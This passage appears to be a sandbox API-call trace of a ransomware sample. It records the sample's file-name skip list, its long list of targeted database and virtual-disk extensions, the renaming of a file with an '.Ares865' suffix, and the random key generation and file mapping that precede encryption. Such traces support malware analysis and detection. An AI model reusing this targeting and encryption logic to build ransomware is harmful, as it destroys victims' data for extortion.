ftLastWriteTime.dwLowDateTime=0xdcc65a55, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="aoldtz.exe") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2=".") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="..") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="windows") returned -1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="bootmgr") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="temp") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="pagefile.sys") returned 1 [0084.797] lstrcmpiW (lpString1="usertile18.bmp", lpString2="boot") returned 1 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2="ids.txt") returned 1 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2="ntuser.dat") returned 1 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2="perflogs") returned 1 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2="MSBuild") returned 1 [0084.798] lstrlenW (lpString="usertile18.bmp") returned 14 [0084.798] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 82 [0084.798] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile18.bmp" | out: lpString1="usertile18.bmp") returned="usertile18.bmp" [0084.798] lstrlenW (lpString="usertile18.bmp") returned 14 [0084.798] lstrlenW (lpString="Ares865") returned 7 [0084.798] lstrcmpiW (lpString1="e18.bmp", lpString2="Ares865") returned 1 [0084.798] lstrlenW (lpString=".dll") returned 4 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2=".dll") returned 1 [0084.798] lstrlenW (lpString=".lnk") returned 4 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2=".lnk") returned 1 [0084.798] lstrlenW (lpString=".ini") returned 4 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2=".ini") returned 1 [0084.798] lstrlenW (lpString=".sys") returned 4 [0084.798] lstrcmpiW (lpString1="usertile18.bmp", lpString2=".sys") returned 1 [0084.798] lstrlenW (lpString="usertile18.bmp") returned 14 [0084.798] lstrlenW (lpString="bak") returned 3 [0084.798] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.798] lstrlenW (lpString="ba_") returned 3 [0084.798] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.798] lstrlenW (lpString="dbb") returned 3 [0084.798] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.798] lstrlenW (lpString="vmdk") returned 4 [0084.798] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.798] lstrlenW (lpString="rar") returned 3 [0084.798] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.798] lstrlenW (lpString="zip") returned 3 [0084.798] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.798] lstrlenW (lpString="tgz") returned 3 [0084.798] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.798] lstrlenW (lpString="vbox") returned 4 [0084.798] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.798] lstrlenW (lpString="vdi") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.799] lstrlenW (lpString="vhd") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.799] lstrlenW (lpString="vhdx") returned 4 [0084.799] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.799] lstrlenW (lpString="avhd") returned 4 [0084.799] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.799] lstrlenW (lpString="db") returned 2 [0084.799] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.799] lstrlenW (lpString="db2") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.799] lstrlenW (lpString="db3") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.799] lstrlenW (lpString="dbf") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.799] lstrlenW (lpString="mdf") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.799] lstrlenW (lpString="mdb") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.799] lstrlenW (lpString="sql") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.799] lstrlenW (lpString="sqlite") returned 6 [0084.799] lstrcmpiW (lpString1="18.bmp", lpString2="sqlite") returned -1 [0084.799] lstrlenW (lpString="sqlite3") returned 7 [0084.799] lstrcmpiW (lpString1="e18.bmp", lpString2="sqlite3") returned -1 [0084.799] lstrlenW (lpString="sqlitedb") returned 8 [0084.799] lstrcmpiW (lpString1="le18.bmp", lpString2="sqlitedb") returned -1 [0084.799] lstrlenW (lpString="xml") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.799] lstrlenW (lpString="$er") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.799] lstrlenW (lpString="4dd") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.799] lstrlenW (lpString="4dl") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.799] lstrlenW (lpString="^^^") returned 3 [0084.799] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.800] lstrlenW (lpString="abs") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.800] lstrlenW (lpString="abx") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.800] lstrlenW (lpString="accdb") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accdb") returned -1 [0084.800] lstrlenW (lpString="accdc") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accdc") returned -1 [0084.800] lstrlenW (lpString="accde") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accde") returned -1 [0084.800] lstrlenW (lpString="accdr") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accdr") returned -1 [0084.800] lstrlenW (lpString="accdt") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accdt") returned -1 [0084.800] lstrlenW (lpString="accdw") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accdw") returned -1 [0084.800] lstrlenW (lpString="accft") returned 5 [0084.800] lstrcmpiW (lpString1="8.bmp", lpString2="accft") returned -1 [0084.800] lstrlenW (lpString="adb") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.800] lstrlenW (lpString="adb") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.800] lstrlenW (lpString="ade") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.800] lstrlenW (lpString="adf") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.800] lstrlenW (lpString="adn") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.800] lstrlenW (lpString="adp") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.800] lstrlenW (lpString="alf") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.800] lstrlenW (lpString="ask") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.800] lstrlenW (lpString="btr") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.800] lstrlenW (lpString="cat") returned 3 [0084.800] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.801] lstrlenW (lpString="cdb") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.801] lstrlenW (lpString="ckp") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.801] lstrlenW (lpString="cma") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.801] lstrlenW (lpString="cpd") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.801] lstrlenW (lpString="dacpac") returned 6 [0084.801] lstrcmpiW (lpString1="18.bmp", lpString2="dacpac") returned -1 [0084.801] lstrlenW (lpString="dad") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.801] lstrlenW (lpString="dadiagrams") returned 10 [0084.801] lstrcmpiW (lpString1="tile18.bmp", lpString2="dadiagrams") returned 1 [0084.801] lstrlenW (lpString="daschema") returned 8 [0084.801] lstrcmpiW (lpString1="le18.bmp", lpString2="daschema") returned 1 [0084.801] lstrlenW (lpString="db-journal") returned 10 [0084.801] lstrcmpiW (lpString1="tile18.bmp", lpString2="db-journal") returned 1 [0084.801] lstrlenW (lpString="db-shm") returned 6 [0084.801] lstrcmpiW (lpString1="18.bmp", lpString2="db-shm") returned -1 [0084.801] lstrlenW (lpString="db-wal") returned 6 [0084.801] lstrcmpiW (lpString1="18.bmp", lpString2="db-wal") returned -1 [0084.801] lstrlenW (lpString="dbc") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.801] lstrlenW (lpString="dbs") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.801] lstrlenW (lpString="dbt") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.801] lstrlenW (lpString="dbv") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.801] lstrlenW (lpString="dbx") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.801] lstrlenW (lpString="dcb") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.801] lstrlenW (lpString="dct") returned 3 [0084.801] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.801] lstrlenW (lpString="dcx") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.802] lstrlenW (lpString="ddl") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.802] lstrlenW (lpString="dlis") returned 4 [0084.802] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.802] lstrlenW (lpString="dp1") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.802] lstrlenW (lpString="dqy") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.802] lstrlenW (lpString="dsk") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.802] lstrlenW (lpString="dsn") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.802] lstrlenW (lpString="dtsx") returned 4 [0084.802] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.802] lstrlenW (lpString="dxl") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.802] lstrlenW (lpString="eco") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.802] lstrlenW (lpString="ecx") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.802] lstrlenW (lpString="edb") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.802] lstrlenW (lpString="epim") returned 4 [0084.802] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.802] lstrlenW (lpString="fcd") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.802] lstrlenW (lpString="fdb") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.802] lstrlenW (lpString="fic") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.802] lstrlenW (lpString="flexolibrary") returned 12 [0084.802] lstrcmpiW (lpString1="ertile18.bmp", lpString2="flexolibrary") returned -1 [0084.802] lstrlenW (lpString="fm5") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.802] lstrlenW (lpString="fmp") returned 3 [0084.802] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.802] lstrlenW (lpString="fmp12") returned 5 [0084.803] lstrcmpiW (lpString1="8.bmp", lpString2="fmp12") returned -1 [0084.803] lstrlenW (lpString="fmpsl") returned 5 [0084.803] lstrcmpiW (lpString1="8.bmp", lpString2="fmpsl") returned -1 [0084.803] lstrlenW (lpString="fol") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.803] lstrlenW (lpString="fp3") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.803] lstrlenW (lpString="fp4") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.803] lstrlenW (lpString="fp5") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.803] lstrlenW (lpString="fp7") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.803] lstrlenW (lpString="fpt") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.803] lstrlenW (lpString="frm") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.803] lstrlenW (lpString="gdb") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.803] lstrlenW (lpString="gdb") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.803] lstrlenW (lpString="grdb") returned 4 [0084.803] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.803] lstrlenW (lpString="gwi") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.803] lstrlenW (lpString="hdb") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.803] lstrlenW (lpString="his") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.803] lstrlenW (lpString="ib") returned 2 [0084.803] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.803] lstrlenW (lpString="idb") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.803] lstrlenW (lpString="ihx") returned 3 [0084.803] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.803] lstrlenW (lpString="itdb") returned 4 [0084.803] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.803] lstrlenW (lpString="itw") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.804] lstrlenW (lpString="jet") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.804] lstrlenW (lpString="jtx") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.804] lstrlenW (lpString="kdb") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.804] lstrlenW (lpString="kexi") returned 4 [0084.804] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.804] lstrlenW (lpString="kexic") returned 5 [0084.804] lstrcmpiW (lpString1="8.bmp", lpString2="kexic") returned -1 [0084.804] lstrlenW (lpString="kexis") returned 5 [0084.804] lstrcmpiW (lpString1="8.bmp", lpString2="kexis") returned -1 [0084.804] lstrlenW (lpString="lgc") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.804] lstrlenW (lpString="lwx") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.804] lstrlenW (lpString="maf") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.804] lstrlenW (lpString="maq") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.804] lstrlenW (lpString="mar") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.804] lstrlenW (lpString="marshal") returned 7 [0084.804] lstrcmpiW (lpString1="e18.bmp", lpString2="marshal") returned -1 [0084.804] lstrlenW (lpString="mas") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.804] lstrlenW (lpString="mav") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.804] lstrlenW (lpString="maw") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.804] lstrlenW (lpString="mdbhtml") returned 7 [0084.804] lstrcmpiW (lpString1="e18.bmp", lpString2="mdbhtml") returned -1 [0084.804] lstrlenW (lpString="mdn") returned 3 [0084.804] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.804] lstrlenW (lpString="mdt") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.805] lstrlenW (lpString="mfd") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.805] lstrlenW (lpString="mpd") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.805] lstrlenW (lpString="mrg") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.805] lstrlenW (lpString="mud") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.805] lstrlenW (lpString="mwb") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.805] lstrlenW (lpString="myd") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.805] lstrlenW (lpString="ndf") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.805] lstrlenW (lpString="nnt") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.805] lstrlenW (lpString="nrmlib") returned 6 [0084.805] lstrcmpiW (lpString1="18.bmp", lpString2="nrmlib") returned -1 [0084.805] lstrlenW (lpString="ns2") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.805] lstrlenW (lpString="ns3") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.805] lstrlenW (lpString="ns4") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.805] lstrlenW (lpString="nsf") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.805] lstrlenW (lpString="nv") returned 2 [0084.805] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.805] lstrlenW (lpString="nv2") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.805] lstrlenW (lpString="nwdb") returned 4 [0084.805] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.805] lstrlenW (lpString="nyf") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.805] lstrlenW (lpString="odb") returned 3 [0084.805] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.806] lstrlenW (lpString="odb") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.806] lstrlenW (lpString="oqy") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.806] lstrlenW (lpString="ora") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.806] lstrlenW (lpString="orx") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.806] lstrlenW (lpString="owc") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.806] lstrlenW (lpString="p96") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.806] lstrlenW (lpString="p97") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.806] lstrlenW (lpString="pan") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.806] lstrlenW (lpString="pdb") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.806] lstrlenW (lpString="pdm") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.806] lstrlenW (lpString="pnz") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.806] lstrlenW (lpString="qry") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.806] lstrlenW (lpString="qvd") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.806] lstrlenW (lpString="rbf") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.806] lstrlenW (lpString="rctd") returned 4 [0084.806] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.806] lstrlenW (lpString="rod") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.806] lstrlenW (lpString="rodx") returned 4 [0084.806] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.806] lstrlenW (lpString="rpd") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.806] lstrlenW (lpString="rsd") returned 3 [0084.806] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.807] lstrlenW (lpString="sas7bdat") returned 8 [0084.807] lstrcmpiW (lpString1="le18.bmp", lpString2="sas7bdat") returned -1 [0084.807] lstrlenW (lpString="sbf") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.807] lstrlenW (lpString="scx") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.807] lstrlenW (lpString="sdb") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.807] lstrlenW (lpString="sdc") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.807] lstrlenW (lpString="sdf") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.807] lstrlenW (lpString="sis") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.807] lstrlenW (lpString="spq") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.807] lstrlenW (lpString="te") returned 2 [0084.807] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.807] lstrlenW (lpString="teacher") returned 7 [0084.807] lstrcmpiW (lpString1="e18.bmp", lpString2="teacher") returned -1 [0084.807] lstrlenW (lpString="tmd") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.807] lstrlenW (lpString="tps") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.807] lstrlenW (lpString="trc") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.807] lstrlenW (lpString="trc") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.807] lstrlenW (lpString="trm") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.807] lstrlenW (lpString="udb") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.807] lstrlenW (lpString="udl") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.807] lstrlenW (lpString="usr") returned 3 [0084.807] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.807] lstrlenW (lpString="v12") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.808] lstrlenW (lpString="vis") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.808] lstrlenW (lpString="vpd") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.808] lstrlenW (lpString="vvv") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.808] lstrlenW (lpString="wdb") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.808] lstrlenW (lpString="wmdb") returned 4 [0084.808] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.808] lstrlenW (lpString="wrk") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.808] lstrlenW (lpString="xdb") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.808] lstrlenW (lpString="xld") returned 3 [0084.808] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.808] lstrlenW (lpString="xmlff") returned 5 [0084.808] lstrcmpiW (lpString1="8.bmp", lpString2="xmlff") returned -1 [0084.808] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.Ares865") returned 90 [0084.808] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.ares865"), dwFlags=0x1) returned 1 [0084.809] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.810] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.810] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.811] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.811] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.811] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.812] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.816] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.816] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.816] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.816] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 